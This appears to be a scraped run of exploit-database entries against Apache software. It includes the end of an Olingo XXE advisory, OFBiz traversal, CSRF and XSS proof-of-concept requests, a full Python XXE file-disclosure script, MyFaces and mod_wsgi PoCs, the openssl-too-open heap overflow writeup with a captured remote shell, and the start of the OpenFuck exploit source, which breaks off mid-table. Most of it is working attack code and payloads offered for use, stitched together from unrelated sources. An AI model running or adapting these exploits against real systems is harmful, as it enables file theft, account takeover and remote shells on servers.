<a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars/$entity">
<a:id>Cars(1)</a:id>
<a:title></a:title>
<a:summary></a:summary>
<a:updated>2019-11-08T15:10:30Z</a:updated>
<a:author>
<a:name></a:name>
</a:author>
<a:link rel="edit" href="Cars(1)"></a:link>
<a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link>
<a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category>
<a:content type="application/xml">
<m:properties>
<d:Id m:type="Int16">1</d:Id>
<d:Model>F1 &xxe;</d:Model>
<d:ModelYear>2012</d:ModelYear>
<d:Price m:type="Decimal">189189.43</d:Price>
<d:Currency>EUR</d:Currency>
</m:properties>
</a:content>
</a:entry>
Response
========
HTTP/1.1 201 Created
Server: Apache-Coyote/1.1
OData-Version: 4.0
Content-Type: application/xml
Content-Length: 960
Date: Fri, 08 Nov 2019 14:22:35 GMT
Connection: close
<?xml version="1.0" encoding="UTF-8"?><a:entry xmlns:a="http://www.w3.org/2005/Atom" xmlns:m="http://docs.oasis-open.org/odata/ns/metadata" xmlns:d="http://docs.oasis-open.org/odata/ns/data" m:context="$metadata#Cars"><a:id>Cars(1)</a:id><a:title></a:title><a:summary></a:summary><a:updated>2019-11-08T15:22:35Z</a:updated><a:author><a:name></a:name></a:author><a:link rel="edit" href="Cars(1)"></a:link><a:link rel="http://docs.oasis-open.org/odata/ns/related/Manufacturer" type="application/atom+xml;type=feed" title="Manufacturer" href="Cars(1)/Manufacturer"></a:link><a:category scheme="http://docs.oasis-open.org/odata/ns/scheme" term="#olingo.odata.sample.Car"></a:category><a:content type="application/xml"><m:properties><d:Id m:type="Int16">1</d:Id><d:Model>
myuser:x:1000:1000:,,,:/home/myuser:/bin/bash
</d:Model><d:ModelYear>2012</d:ModelYear><d:Price m:type="Decimal">189189.43</d:Price><d:Currency>EUR</d:Currency></m:properties></a:content></a:entry>
Workaround / Fix:
-----------------
Configure the XML reader securely [3].
In org.apache.olingo.server.core.deserializer.xml.ODataXmlDeserializer.java on line 70 a javax.xml.stream.XMLInputFactory is instanciated:
private static final XMLInputFactory FACTORY = XMLInputFactory.newFactory();
The XMLInputFactory should be configured, not to resolve external entities:
FACTORY.setProperty(XMLInputFactory.SUPPORT_DTD, false);
FACTORY.setProperty("javax.xml.stream.isSupportingExternalEntities", false);
Timeline:
---------
2019-11-08: Discovery by Compass Security
2019-11-08: Initial vendor notification
2019-11-08: Initial vendor response
2019-12-04: Release of fixed Version / Patch [4]
2019-12-05: Coordinated public disclosure date
[1] https://olingo.apache.org/
[2] https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing
[3] https://cheatsheetseries.owasp.org/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.html
[4] https://mail-archives.apache.org/mod_mbox/olingo-user/201912.mbox/%3CCAGSZ4d7Ty%3DL-n_iAzT6vcQp65BY29XZDS5tMoM8MdDrb1moM7A%40mail.gmail.com%3E
Source: https://www.compass-security.com/fileadmin/Datein/Research/Advisories/CSNC-2019-025_apache_xxe.txt
# Exploit Title: Apache OFBiz 18.12.12 - Directory Traversal
# Google Dork: N/A
# Date: 2024-05-16
# Exploit Author: [Abdualhadi khalifa (https://twitter.com/absholi_ly)
# Vendor Homepage: https://ofbiz.apache.org/
## Software Link: https://ofbiz.apache.org/download.html
# Version: below <=18.12.12
# Tested on: Windows10
Poc.
1-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>example.createBlogPost</methodName>
<params>
<param>
<value><string>../../../../../../etc/passwd</string></value>
</param>
</params>
</methodCall>
OR
2-
POST /webtools/control/xmlrpc HTTP/1.1
Host: vulnerable-host.com
Content-Type: text/xml
<?xml version="1.0"?>
<methodCall>
<methodName>performCommand</methodName>
<params>
<param>
<value><string>../../../../../../windows/system32/cmd.exe?/c+dir+c:\</string></value>
</param>
</params>
</methodCall>
# Exploit Title: Apache OFBiz 17.12.03 - Cross-Site Request Forgery (Account Takeover)
# Exploit Author: Faiz Ahmed Zaidi
# Vendor Homepage: [https://ofbiz.apache.org/security.html]
# Software Link: https://ofbiz.apache.org/download.html#security
# Version: Before 17.12.03
# Tested on: Linux and Windows
# CVE : CVE-2019-0235
#Exploit Code:
<html>
<body>
<form action="https://hostipaddress:8443/partymgr/control/updateEmailAddress" method="POST">
<input type="hidden" name="contactMechId" value="admin" />
<input type="hidden" name="contactMechTypeId" value="EMAIL_ADDRESS" />
<input type="hidden" name="partyId" value="admin" />
<input type="hidden" name="DONE_PAGE" value="viewprofile?party_id=admin∂yId=admin" />
<input type="hidden" name="emailAddress" value="attackeremail@id.com" />
<input type="hidden" name="allowSolicitation" value="Y" />
<input type="submit" value="Submit request" />
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>
After that do a password reset via forget password.
It's done :)
# Exploit Title: Apache OFBiz v16.11.05 - Stored Cross-Site Scripting Vulnerability
# Google Dork: N/A
# Date: 09 - December - 2018
# Exploit Author: DKM
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://www.apache.org/dyn/closer.lua/ofbiz/apache-ofbiz-16.11.05.zip
# Version: v16.11.05
# Tested on: Windows 10/Ubuntu/Kali Linux
# CVE : N/A
# Description:
A Stored Cross Site Scripting vulnerability is found in the "Text Data" Field within the 'ViewForumMessage' section.
This is because the application does not properly sanitise the users input.
# Steps to Reproduce:
1. Login into the E-Commerce application as any user.
2. Open or the URL will be(https://localhost:8443/ecommerce/control/AddForumThread?forumId=ASK)
3. In "Short Name" give enything you want, Now scroll down and click on "Source" Button, Now in "Text Data" field give payload as: <script>alert(1)</script> and click on "Add"
4. In the next page click on "View" respective to the newly added data and one can see that our XSS Payload gets executed.
5. The same things happens to the message reply page on "ViewForumMessage" which further confirms the presence of stored XSS.
# Exploit Title: Apache OFBiz 16.11.04 - XML External Entity Injection
# Date: 2018-10-15
# Exploit Author: Jamie Parfet
# Vendor Homepage: https://ofbiz.apache.org/
# Software Link: https://archive.apache.org/dist/ofbiz/
# Version: < 16.11.04
# Tested on: Ubuntu 18.04.1
# CVE: N/A
#!/usr/bin/env python3
# *****************************************************
# Type: XML External Entity Injection (File disclosure)
# Target: Apache OFBiz < 16.11.04
# Author: Jamie Parfet
# *****************************************************
import sys
import os
import requests
import urllib3
import re
import argparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
simple_payload = """<?xml version="1.0"?><!DOCTYPE x [<!ENTITY disclose SYSTEM "file://{}">]>
<methodCall><methodName>xXx
&disclose;xXx</methodName></methodCall>
"""
if len(sys.argv) <= 1:
print('[*] Apache OFBiz < 16.11.04 XXE')
print('[*] Use "%s -h" to display help.' % (sys.argv[0]))
exit(0)
parser = argparse.ArgumentParser()
parser.add_argument("-u",
metavar="https://localhost:8443",
dest="url",
required=True,
help="Target URL (required)",
action='store')
parser.add_argument("-f",
metavar="/etc/passwd",
dest="file",
help="Target file",
action='store')
parser.add_argument("-c",
metavar="/home/",
dest="crawl",
help="Target directory to start crawling from",
action='store')
parser.add_argument("-o",
metavar="~/local/output/directory/",
dest="output_dir",
help="Local directory that remote file will be saved to",
action='store')
args = parser.parse_args()
url = args.url if args.url else None
target_file = args.file if args.file else None
crawl_dir = args.crawl if args.crawl else None
output_dir = args.output_dir if args.output_dir else None
def check_url(url):
if '://' not in url:
print('[-] ERROR: Please include protocol in URL, such as https://{}'.format(url))
exit(0)
else:
return url
def request(url, payload):
response = requests.post(url + '/webtools/control/xmlrpc', data=payload, verify=False).text
parsed_response = re.sub(r'(.*xXx\n|xXx.*)', '', response)
return parsed_response
def crawl(crawl_dir):
payload = simple_payload.format(crawl_dir)
response = request(url, payload)
payload_404 = simple_payload.format(crawl_dir + "/xX404Xx")
response_404 = request(url, payload_404)
if 'No such file or directory' in response:
print("[-] ERROR - 404: {}".format(crawl_dir))
elif 'Permission denied' in response or 'but is not accessible' in response:
print("[-] ERROR - Permission: {}".format(crawl_dir))
elif 'Not a directory' in response_404:
print("[*] FILE: {}".format(crawl_dir))
else:
print("[*] DIR: {}".format(crawl_dir))
for f in response.splitlines():
full_path = (crawl_dir + '/' + f)
crawl(full_path)
def main(url=url, target_file=target_file, crawl_dir=crawl_dir, output_dir=output_dir):
if url:
check_url(url)
if crawl_dir:
crawl(crawl_dir)
else:
payload = simple_payload.format(target_file)
if output_dir:
if os.path.isdir(output_dir):
result = request(url, payload)
remote_file_name = re.sub('/', '--', target_file)
output_file = (output_dir + '/' + remote_file_name[2:])
file = open(output_file, 'w')
file.write(result)
file.close()
else:
print("[-] ERROR: {} is not a writeable directory".format(output_dir))
else:
result = request(url, payload)
print(result)
if __name__ == '__main__':
try:
main()
except KeyboardInterrupt:
print('\nKeyboard interrupt detected.')
print('Exiting...')
exit(0)
source: https://www.securityfocus.com/bid/57463/info
Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Apache OFBiz versions prior to 10.04.05 and 11.04.02 are vulnerable.
GET
/exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script>
HTTP/1.1
Host: www.example.com:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101
Firefox/17.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Connection: keep-alive
Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037
Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002
source: https://www.securityfocus.com/bid/51939/info
Apache MyFaces is prone to a remote information-disclosure vulnerability.
Remote attackers can exploit this issue to obtain sensitive information that may aid in further attacks.
The following versions are affected:
Apache MyFaces 2.0.1 through 2.0.11
Apache MyFaces 2.1.0 through 2.1.5
http://www.example.com/faces/javax.faces.resource/web.xml?ln=../WEB-INF
http://www.example.com/faces/javax.faces.resource/web.xml?ln=..\\WEB-INF
source: https://www.securityfocus.com/bid/67534/info
mod_wsgi is prone to a remote information-disclosure vulnerability.
Attackers can exploit this issue to obtain sensitive information that may aid in launching further attacks.
import functools
import threading
import time
import random
def run(*args):
while True:
items = []
for i in range(1000):
items.append((int(random.random()*20)*'X'))
time.sleep(0.00001)
thread = threading.Thread(target=run)
thread.start()
def headers():
return [('Content-Type', 'text/plain'.upper().lower())]
def response():
yield 'Hello World!\n'
_content_type_cache = {}
def intern_content_type(application):
@functools.wraps(application)
def _wrapper(environ, start_response):
def _start_response(status, headers, *args):
_headers = []
for header, value in headers:
if header.lower() == 'content-type':
value = _content_type_cache.setdefault(value, value)
_headers.append((header, value))
return start_response(status, _headers, *args)
return application(environ, _start_response)
return _wrapper
#@intern_content_type
def application(environ, start_response):
status = '200 OK'
start_response(status, headers())
return response()
/*
* openssl-too-open.c - OpenSSL remote exploit
* Spawns a nobody/apache shell on Apache, root on other servers.
*
* by Solar Eclipse <solareclipse@phreedom.org>
*
* Thanks to Core, HD Moore, Zillion, Dvorak and Black Berry for their help.
*
* This code or any derivative versions of it may not be posted to Bugtraq
* or anywhere on SecurityFocus, Symantec or any affiliated site.
*
*/
---------[ ./openssl-too-open ]
openssl-too-open is a remote exploit for the KEY_ARG overflow in
OpenSSL 0.9.6d and older. It will give you a remote shell with the
priviledges of the server process (nobody when used against Apache,
root against other servers).
Only Linux/x86 targets are supported.
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
Usage: ./openssl-too-open [options] <host>
-a <arch> target architecture (default is 0x00)
-p <port> SSL port (default is 443)
-c <N> open N apache connections before sending the shellcode (default is 30)
-m <N> maximum number of open connections (default is 50)
-v verbose mode
Supported architectures:
0x00 - Gentoo (apache-1.3.24-r2)
0x01 - Debian Woody GNU/Linux 3.0 (apache-1.3.26-1)
0x02 - Slackware 7.0 (apache-1.3.26)
0x03 - Slackware 8.1-stable (apache-1.3.26)
0x04 - RedHat Linux 6.0 (apache-1.3.6-7)
0x05 - RedHat Linux 6.1 (apache-1.3.9-4)
0x06 - RedHat Linux 6.2 (apache-1.3.12-2)
0x07 - RedHat Linux 7.0 (apache-1.3.12-25)
0x08 - RedHat Linux 7.1 (apache-1.3.19-5)
0x09 - RedHat Linux 7.2 (apache-1.3.20-16)
0x0a - Redhat Linux 7.2 (apache-1.3.26 w/PHP)
0x0b - RedHat Linux 7.3 (apache-1.3.23-11)
0x0c - SuSE Linux 7.0 (apache-1.3.12)
0x0d - SuSE Linux 7.1 (apache-1.3.17)
0x0e - SuSE Linux 7.2 (apache-1.3.19)
0x0f - SuSE Linux 7.3 (apache-1.3.20)
0x10 - SuSE Linux 8.0 (apache-1.3.23-137)
0x11 - SuSE Linux 8.0 (apache-1.3.23)
0x12 - Mandrake Linux 7.1 (apache-1.3.14-2)
0x13 - Mandrake Linux 8.0 (apache-1.3.19-3)
0x14 - Mandrake Linux 8.1 (apache-1.3.20-3)
0x15 - Mandrake Linux 8.2 (apache-1.3.23-4)
Examples: ./openssl-too-open -a 0x01 -v localhost
./openssl-too-open -p 1234 192.168.0.1 -c 40 -m 80
---------[ ./openssl-scanner ]
openssl-scanner scans a number of hosts for vulnerable OpenSSL
implementations.
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>
Usage: ./openssl-scanner [options] <host>
-i <inputfile> file with target hosts
-o <outputfile> output log
-a append to output log (requires -o)
-b check for big endian servers
-C scan the entire class C network the host belogs to
-d debug mode
-w N connection timeout in seconds
Examples: ./openssl-scanner -d 192.168.0.1
./openssl-scanner -i hosts -o my.log -w 5
---------[ Screenshots ]
$ ./openssl-scanner -C 192.168.0.0
: openssl-scanner : OpenSSL vulnerability scanner
by Solar Eclipse <solareclipse@phreedom.org>
Opening 255 connections . . . . . . . . . . done
Waiting for all connections to finish . . . . . . . . . . . done
192.168.0.136: Vulnerable
$ nc 192.168.0.1 80
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Tue, 17 Sep 2002 17:47:44 GMT
Server: Apache-AdvancedExtranetServer/1.3.20 (Mandrake Linux/3mdk) mod_ssl/2.8.4 OpenSSL/0.9.6b
Connection: close
Content-Type: text/html
./openssl-too-open -a 0x14 192.168.0.1
: openssl-too-open : OpenSSL remote exploit
by Solar Eclipse <solareclipse@phreedom.org>
: Opening 30 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x810b3a0
ssl1 : 0x810b360
ssl2 : 0x810b4e0
* Addresses don't match.
: Opening 40 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x80fd668
ssl2 : 0x80fd668
* Addresses don't match.
: Opening 50 connections
Establishing SSL connections
: Using the OpenSSL info leak to retrieve the addresses
ssl0 : 0x8103830
ssl1 : 0x8103830
ssl2 : 0x8103830
: Sending shellcode
ciphers: 0x8103830 start_addr: 0x8103770 SHELLCODE_OFS: 184
Reading tag
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a; id; w;
Linux localhost.localdomain 2.4.8-26mdk #1 Sun Sep 23 17:06:39 CEST 2001 i686 unknown
uid=48(apache) gid=48(apache) groups=48(apache)
1:49pm up 4:26, 1 user, load average: 0.04, 0.07, 0.07
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
bash-2.05$
---------[ How Does openssl-too-open Work? ]
It is important to understand the SSL2 handshake in order to successfully
exploit the KEY_ARG vulnerability.
---/ Typical SSL2 Handshake
Client Server
CLIENT_HELLO -->
<-- SERVER_HELLO
CLIENT_MASTER_KEY -->
<-- SERVER_VERIFY
CLIENT_FINISHED -->
<-- SERVER_FINISHED
The CLIENT_HELLO message contains a list of the ciphers the client supports,
a session id and some challenge data. The session id is used if the client
wishes to reuse an already established session, otherwise it's empty.
The server replies with a SERVER_HELLO message, also listing all supported
ciphers and includes a certificate with its public RSA key. The server
also sends a connection id, which will later be used by the client to
verify that the encryption works.
The client generates a random master key, encrypts it with the server's
public key and sends it with a CLIENT_MASTER_KEY message. This message
also specifies the cipher selected by the client and a KEY_ARG field,
which meaning depends on the specified cipher. For DES-CBC ciphers, the
KEY_ARG contains the initialization vector.
Now both the client and the server have the master key and they can generate
the session keys from it. All messages from this point on are encrypted.
The server replies with a SERVER_VERIFY message, containing the challenge
data from the CLIENT_HELLO message. If the key exchange has been successful,
the client will be able to decrypt this message and the challenge data returned
from the server will match the challenge data sent by the client.
The client sends a CLIENT_FINISHED message with a copy of the connection id
from the SERVER_HELLO packet. It is now the server's turn to decrypt this
message and check if the connection id returned by the client matches the
connection it sent by the server.
Finally the server sends a SERVER_FINISHED message, completing the handshake.
This message contains a session id, generated by the server. If the client
wishes to reuse the session later, it can send this session id with the
CLIENT_HELLO message.
---/ The KEY_ARG Buffer Overflow
The bug is in ssl/s2_srvr.c, in the get_client_master_key() function. This
function reads a CLIENT_MASTER_KEY packet and processes it. It reads the
KEY_ARG_LENGTH value from the client and then copies that many bytes in an
array of a fixed size. This array is part of the SSL_SESSION structure.
If the client specifies a KEY_ARG longer than 8 bytes, the variables in the
SSL_SESSION structure can be overwritten with user supplied data.
Let's look at the definition of this structure.
typedef struct ssl_session_st
{
int ssl_version; /* what ssl version session info is
* being kept in here? */
/* only really used in SSLv2 */
unsigned int key_arg_length;
unsigned char key_arg[SSL_MAX_KEY_ARG_LENGTH];
int master_key_length;
unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH];
/* session_id - valid? */
unsigned int session_id_length;
unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH];
/* this is used to determine whether the session is being reused in
* the appropriate context. It is up to the application to set this,
* via SSL_new */
unsigned int sid_ctx_length;
unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH];
int not_resumable;
/* The cert is the certificate used to establish this connection */
struct sess_cert_st /* SESS_CERT */ *sess_cert;
/* This is the cert for the other end.
* On clients, it will be the same as sess_cert->peer_key->x509
* (the latter is not enough as sess_cert is not retained
* in the external representation of sessions, see ssl_asn1.c). */
X509 *peer;
/* when app_verify_callback accepts a session where the peer's certificate
* is not ok, we must remember the error for session reuse: */
long verify_result; /* only for servers */
int references;
long timeout;
long time;
int compress_meth; /* Need to lookup the method */
SSL_CIPHER *cipher;
unsigned long cipher_id; /* when ASN.1 loaded, this
* needs to be used to load
* the 'cipher' structure */
STACK_OF(SSL_CIPHER) *ciphers; /* shared ciphers? */
CRYPTO_EX_DATA ex_data; /* application specific data */
/* These are used to make removal of session-ids more
* efficient and to implement a maximum cache size. */
struct ssl_session_st *prev,*next;
} SSL_SESSION;
It really looks better with VIM coloring. Anyway, we know the size of the
structure and it's allocated on the heap. The first thing that comes to
mind is to overwrite the next malloc chunk and then make the OpenSSL code
call free() on the SSL_SESSION structure.
After we send a CLIENT_MASTER_KEY message, we'll read a SERVER_VERIFY packet
from the server and then we'll respond with a CLIENT_FINISHED message.
The server uses this the contents of this message to verify that the
key exchange succeeded. If we return a wrong connection id, the server
will abort the connection and free the SSL_SESSION structure, which is
exactly what we want.
We'll overwrite the KEY_ARG array with 8 random bytes and the following
string:
unsigned char overwrite_next_chunk[] =
"AAAA" /* int master_key_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
"AAAA" /* unsigned int session_id_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char session_id[SSL_MAX_SSL_SESSION_ID_LENGTH]; */
"AAAA" /* unsigned int sid_ctx_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
"AAAA" /* unsigned int sid_ctx_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char sid_ctx[SSL_MAX_SID_CTX_LENGTH]; */
"AAAA" /* int not_resumable; */
"\x00\x00\x00\x00" /* struct sess_cert_st *sess_cert; */
"\x00\x00\x00\x00" /* X509 *peer; */
"AAAA" /* long verify_result; */
"\x01\x00\x00\x00" /* int references; */
"AAAA" /* int timeout; */
"AAAA" /* int time */
"AAAA" /* int compress_meth; */
"\x00\x00\x00\x00" /* SSL_CIPHER *cipher; */
"AAAA" /* unsigned long cipher_id; */
"\x00\x00\x00\x00" /* STACK_OF(SSL_CIPHER) *ciphers; */
"\x00\x00\x00\x00\x00\x00\x00\x00" /* CRYPTO_EX_DATA ex_data; */
"AAAAAAAA" /* struct ssl_session_st *prev,*next; */
"\x00\x00\x00\x00" /* Size of previous chunk */
"\x11\x00\x00\x00" /* Size of chunk, in bytes */
"fdfd" /* Forward and back pointers */
"bkbk"
"\x10\x00\x00\x00" /* Size of previous chunk */
"\x10\x00\x00\x00" /* Size of chunk, PREV_INUSE is set */
The "A" bytes don't affect the OpenSSL control flow. The other bytes must be
set to specific values to make the exploit work. For example, the peer and
sess_cert pointers must be NULL, because the SSL cleanup code will call
free() on them before it frees the SSL_SESSION structure.
The free() call will write the value of the bk pointer to the memory
address in the fd pointer + 12 bytes. We'll put our shellcode address
in the bk pointer and we'll write it to the free() entry in the GOT
table.
If you don't understand how freeing this malloc chunk overwrites the GOT
entry or don't know what the GOT table is, visit juliano's site at
http://community.core-sdi.com/~juliano/ and read some papers.
---/ Getting the Shellcode Address
There is only one little problem. We need a place to put our shellcode
and we need the exact shellcode address. The trick is to use the
SERVER_FINISHED message. This message includes the session id, which
is read from the SSL_SESSION structure. The server reads session_id_length
bytes from the session_id[] array and sends them to the client. We can
overwrite the session_id_length variable and complete the handshake.
If session_id_length is long enough, the SERVER_FINISHED message will
include the contents of the SSL_SESSION structure.
To get the contents of the session structure, we'll overwrite the
KEY_ARG array with 8 random bytes and the following string:
unsigned char overwrite_session_id_length[] =
"AAAA" /* int master_key_length; */
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" /* unsigned char master_key[SSL_MAX_MASTER_KEY_LENGTH]; */
"\x70\x00\x00\x00"; /* unsigned int session_id_length; */
Now let's imagine the heap state when we send our connection request.
We have a heap, which contains some allocated chunks of memory and a
large 'top' chunk, covering all free memory.
When the server receives the connection, it forks a child and the child
allocates the SSL_SESSION structure. If there has not been a signifficant
malloc/free activity, the fragmentation of the memory will be low and the
new chunk will be allocated from the beginning of the 'top' chunk.
The next allocated chunk is a 16 bytes chunk which holds a
STACK_OF(SSL_CIPHER) structure. This chunk is also allocated from the
beginning of the 'top' chunk, so it's located right above the SSL_SESSION
structure. The address of this chunk is stored in the session->ciphers
variable.
If we're lucky, the memory would look like this:
| top chunk |
|-----------|
session->ciphers | 16 bytes | <- STACK_OF(SSL_CIPHER) structure
points here -> |-----------|
| 368 bytes | <- SSL_SESSION structure
|-----------|
We can read the session->ciphers pointer from the SSL_SESSION structure
in the SERVER_FINISHED message. By subtracting 368 from it, we'll get
the address of the SSL_SESSION structure, and thus the address of
the data we've overwritten.
---/ fork() Is Your Friend
We'll use the same buffer overflow to get the address of the shellcode
and to overwrite the malloc chunks. The problem is that we need to
know the shellcode address before we send it to the server.
The only solution is to send 2 requests. The first request overwrites
session_id_length and we complete the handshake to get the SERVER_FINISHED
message. Then we adjust our shellcode and open a second connection
which we use to send it.
If we're dealing with a forking server like Apache, the two children
will have an identical memory layout and malloc() will put the
session structure at the same address. Of course, life is never that
simple. Apache children can handle multiple requests, which would
change the memory allocation pattern of the two children we use.
To guarantee that both children are freshly spawned, our exploit
will open a number of connections to the server before sending the
two important requests. These connection should use up all available
Apache children and force new ones to be spawned.
If the server traffic is high, the exploit might fail. If the
memory allocation patterns are different, the exploit might fail.
If you have a wrong GOT address, the exploit will definitely fail.
---------[ How Does openssl-too-open Work? ]
openssl-scanner overflows the master_key_length, master_key[] and session_id_length
variables in the SSL_SESSION structure. The first two are uninitialized at this point,
so overwriting them has no effect on openssl. The first place where the session_id_length
variable is used after we overwrite it is in session_finish() (ssl/s2_srvr.c:847)
memcpy(p,s->session->session_id, (unsigned int)s->session->session_id_length);
This data is returned in the SERVER_FINISHED packet. openssl-scanner checks the length
of the data. If it matches the value we set session_id_length to, then the server is
exploitable.
OpenSSL 0.9.6e and higher versions return
192.160.0.2: Server error: SSL2_PE_UNDEFINED_ERROR (0x00) after KEY_ARG data was sent. Server is not vulnerable.
The updates that most vendors have put out backport the changes from 0.9.6e to 0.9.6b
or some other version of OpenSSL. They don't return an error like 0.9.6e.
The updated RedHat and Debian packages) would close the connection immediatelly
after they receive the oversized KEY_ARG data, causing openssl-scanner to report
192.168.0.1: Connection closed after KEY_ARG data was sent. Server is most likely not vulnerable.
IIS servers exhibit the same behavior.
IIS servers that don't have a certificate set up close the connection as soon as
they receive the CLIENT_HELLO packet. openssl-scanner reports this as
192.168.0.2: Connection unexpectedly closed
/* EOF */
http://www.phreedom.org/solar/exploits/apache-openssl/openssl-too-open.tar.gz
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40347.tar.gz (openssl-too-open.tar.gz)
/*
* OF version r00t VERY PRIV8 spabam
* Version: v3.0.4
* Requirements: libssl-dev ( apt-get install libssl-dev )
* Compile with: gcc -o OpenFuck OpenFuck.c -lcrypto
* objdump -R /usr/sbin/httpd|grep free to get more targets
* #hackarena irc.brasnet.org
* Note: if required, host ptrace and replace wget target
*/
#include <arpa/inet.h>
#include <netinet/in.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>
#include <stdio.h>
#include <unistd.h>
#include <openssl/ssl.h>
#include <openssl/rsa.h>
#include <openssl/x509.h>
#include <openssl/evp.h>
#include <openssl/rc4.h>
#include <openssl/md5.h>
#define SSL2_MT_ERROR 0
#define SSL2_MT_CLIENT_FINISHED 3
#define SSL2_MT_SERVER_HELLO 4
#define SSL2_MT_SERVER_VERIFY 5
#define SSL2_MT_SERVER_FINISHED 6
#define SSL2_MAX_CONNECTION_ID_LENGTH 16
/* update this if you add architectures */
#define MAX_ARCH 138
struct archs {
char* desc;
int func_addr; /* objdump -R /usr/sbin/httpd | grep free */
} architectures[] = {
{"Caldera OpenLinux (apache-1.3.26)",0x080920e0},
{"Cobalt Sun 6.0 (apache-1.3.12)",0x8120f0c},
{"Cobalt Sun 6.0 (apache-1.3.20)",0x811dcb8},
{"Cobalt Sun x (apache-1.3.26)",0x8123ac3},
{"Cobalt Sun x Fixed2 (apache-1.3.26)",0x81233c3},
{"Conectiva 4 (apache-1.3.6)",0x08075398},
{"Conectiva 4.1 (apache-1.3.9)",0x0808f2fe},
{"Conectiva 6 (apache-1.3.14)",0x0809222c},
{"Conectiva 7 (apache-1.3.12)",0x0808f874},
{"Conectiva 7 (apache-1.3.19)",0x08088aa0},
{"Conectiva 7/8 (apache-1.3.26)",0x0808e628},
{"Conectiva 8 (apache-1.3.22)",0x0808b2d0},
{"Debian GNU Linux 2.2 Potato (apache_1.3.9-14.1)",0x08095264},
{"Debian GNU Linux (apache_1.3.19-1)",0x080966fc},
{"Debian GNU Linux (apache_1.3.22-2)",0x08096aac},
{"Debian GNU Linux (apache-1.3.22-2.1)",0x08083828},
{"Debian GNU Linux (apache-1.3.22-5)",0x08083728},
{"Debian GNU Linux (apache_1.3.23-1)",0x08085de8},
{"Debian GNU Linux (apache_1.3.24-2.1)",0x08087d08},
{"Debian Linux GNU Linux 2 (apache_1.3.24-2.1)",0x080873ac},
{"Debian GNU Linux (apache_1.3.24-3)",0x08087d68},
{"Debian GNU Linux (apache-1.3.26-1)",0x0080863c4},
{"Debian GNU Linux 3.0 Woody (apache-1.3.26-1)",0x080863cc},
{"Debian GNU Linux (apache-1.3.27)",0x0080866a3},
{"FreeBSD (apache-1.3.9)", 0xbfbfde00},
{"FreeBSD (apache-1.3.11)",0x080a2ea8},
{"FreeBSD (apache-1.3.12.1.40)",0x080a7f58},
{"FreeBSD (apache-1.3.12.1.40)",0x080a0ec0},
{"FreeBSD (apache-1.3.12.1.40)",0x080a7e7c},
{"FreeBSD (apache-1.3.12.1.40_1)",0x080a7f18},
{"FreeBSD (apache-1.3.12)",0x0809bd7c},
{"FreeBSD (apache-1.3.14)", 0xbfbfdc00},
{"FreeBSD (apache-1.3.14)",0x080ab68c},
{"FreeBSD (apache-1.3.14)",0x0808c76c},
{"FreeBSD (apache-1.3.14)",0x080a3fc8},
{"FreeBSD (apache-1.3.14)",0x080ab6d8},
{"FreeBSD (apache-1.3.17_1)",0x0808820c},
{"FreeBSD (apache-1.3.19)", 0xbfbfdc00},
{"FreeBSD (apache-1.3.19_1)",0x0808c96c},
{"FreeBSD (apache-1.3.20)",0x0808cb70},
{"FreeBSD (apache-1.3.20)", 0xbfbfc000},
{"FreeBSD (apache-1.3.20+2.8.4)",0x0808faf8},
{"FreeBSD (apache-1.3.20_1)",0x0808dfb4},
{"FreeBSD (apache-1.3.22)", 0xbfbfc000},
{"FreeBSD (apache-1.3.22_7)",0x0808d110},
{"FreeBSD (apache_fp-1.3.23)",0x0807c5f8},
{"FreeBSD (apache-1.3.24_7)",0x0808f8b0},
{"FreeBSD (apache-1.3.24+2.8.8)",0x080927f8},
